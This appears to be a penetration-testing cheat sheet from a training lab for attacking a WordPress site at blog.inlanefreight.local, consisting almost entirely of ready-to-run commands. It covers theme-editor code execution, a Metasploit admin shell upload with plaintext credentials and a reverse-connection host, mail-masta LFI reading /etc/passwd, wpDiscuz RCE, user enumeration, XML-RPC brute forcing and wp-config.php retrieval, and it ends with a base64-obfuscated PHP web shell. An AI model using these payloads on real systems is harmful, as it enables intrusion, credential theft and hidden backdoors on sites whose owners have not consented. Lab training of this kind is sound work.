2.-Attacking-wordpress

1. Manual Code Execution via Theme Editor (404.php)

curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id

2. Metasploit wp_admin_shell_upload

msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username john
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password firebird1
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 10.10.14.15
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 10.129.42.195
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set VHOST blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

3. mail-masta LFI Exploit

curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

4. wpDiscuz RCE Exploit

Python Script Method

python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1

Curl Method

curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id

5. WordPress REST API User Enumeration

curl -s http://blog.inlanefreight.local/wp-json/wp/v2/users

6. XML-RPC Brute Force (system.multicall)

python3 xmlrpc_bruteforce.py -u http://blog.inlanefreight.local/xmlrpc.php -U users.txt -P passwords.txt

7. wp-config.php Exposure Check

curl -s http://blog.inlanefreight.local/wp-config.php

8. Web Shell Obfuscation Example

<?php eval(base64_decode("c3lzdGVtKCRfR0VUWyJjbWQiXSk7")); ?>